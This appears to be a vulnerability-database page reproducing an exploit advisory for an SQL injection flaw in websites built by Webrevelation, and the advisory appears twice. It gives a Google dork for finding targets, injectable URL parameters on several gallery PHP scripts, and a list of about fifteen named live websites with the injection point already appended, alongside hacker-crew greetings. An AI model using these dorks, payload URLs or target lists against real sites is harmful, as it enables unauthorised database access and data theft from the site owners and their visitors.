logo
DATABASE RESOURCES PRICING ABOUT US

Site by Webrevelation SQL Injection Vulnerability

Description

=========================================================== Site by Webrevelation SQL Injection Vulnerability =========================================================== :-----------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Site by Webrevelation SQL Injection Vulnerability : # Date : 03 May 2013 : # Author : X-Cisadane : # Vendor : www.webrevelation.com : # Version : All Versions : # Category : Web Applications : # Vulnerability : SQL Injection Vulnerability : # Tested On : Google Chrome 24.0.1312.52 m (Windows XP Professional SP 3 32-Bit EN US) : # Greetz To : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Jakarta Anonymous Club, Bogor-H, Mantan Gw :-----------------------------------------------------------------------------------------------------------------------: DORKS (How to find the target) : intext:"Site by Webrevelation" Proof of Concept ================= http://[Site]/[Path]/gallery_images.php?catid=['SQLi] http://[Site]/[Path]/gallery_image.php?imageid=['SQLi] http://[Site]/[Path]/photogallery.php?catid=['SQLi] http://[Site]/[Path]/photo_categories.php?catid=['SQLi] Example : http://brushbusters.net/html/gallery_images.php?catid='5 https://webserver.censara.org/html/gallery_images.php?catid='11 http://www.dentalonebs.com/html/gallery_images.php?catid='12 http://www.denikeministries.org/html/gallery_images.php?catid='0 http://www.scarytastesgood.com/m/gallery_images.php?catid='3 http://www.sjblinings.com/html/gallery_images.php?catid='1 http://www.budblakley.com/html/gallery_image.php?imageid='71 http://www.perfectionequipment.com/html/gallery_image.php?imageid='36 http://www.savannahbuilders.net/html/photogallery.php?catid='10 http://www.worshipvancouver.com/html/gallery_images.php?catid='7 http://www.stevebarnesnewhomes.com/html/gallery_images.php?catid='3 http://www.investinc.info/html/gallery_images.php?catid='4 http://www.oconnorslawn.com/html/gallery_images.php?catid=-10 http://www.lachiquemaison.com/html/gallery_images.php?catid='20 http://www.crookedoak.org/html/photo_categories.php?catid=-17 Sent from my BlackBerry® smartphone from Sinyal Bagus XL, Nyambung Teruuusss...! attachment.txt =========================================================== Site by Webrevelation SQL Injection Vulnerability =========================================================== :-----------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Site by Webrevelation SQL Injection Vulnerability : # Date : 03 May 2013 : # Author : X-Cisadane : # Vendor : www.webrevelation.com : # Version : All Versions : # Category : Web Applications : # Vulnerability : SQL Injection Vulnerability : # Tested On : Google Chrome 24.0.1312.52 m (Windows XP Professional SP 3 32-Bit EN US) : # Greetz To : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Jakarta Anonymous Club, Bogor-H, Mantan Gw :-----------------------------------------------------------------------------------------------------------------------: DORKS (How to find the target) : intext:"Site by Webrevelation" Proof of Concept ================= http://[Site]/[Path]/gallery_images.php?catid=['SQLi] http://[Site]/[Path]/gallery_image.php?imageid=['SQLi] http://[Site]/[Path]/photogallery.php?catid=['SQLi] http://[Site]/[Path]/photo_categories.php?catid=['SQLi] Example : http://brushbusters.net/html/gallery_images.php?catid='5 https://webserver.censara.org/html/gallery_images.php?catid='11 http://www.dentalonebs.com/html/gallery_images.php?catid='12 http://www.denikeministries.org/html/gallery_images.php?catid='0 http://www.scarytastesgood.com/m/gallery_images.php?catid='3 http://www.sjblinings.com/html/gallery_images.php?catid='1 http://www.budblakley.com/html/gallery_image.php?imageid='71 http://www.perfectionequipment.com/html/gallery_image.php?imageid='36 http://www.savannahbuilders.net/html/photogallery.php?catid='10 http://www.worshipvancouver.com/html/gallery_images.php?catid='7 http://www.stevebarnesnewhomes.com/html/gallery_images.php?catid='3 http://www.investinc.info/html/gallery_images.php?catid='4 http://www.oconnorslawn.com/html/gallery_images.php?catid=-10 http://www.lachiquemaison.com/html/gallery_images.php?catid='20 http://www.crookedoak.org/html/photo_categories.php?catid=-17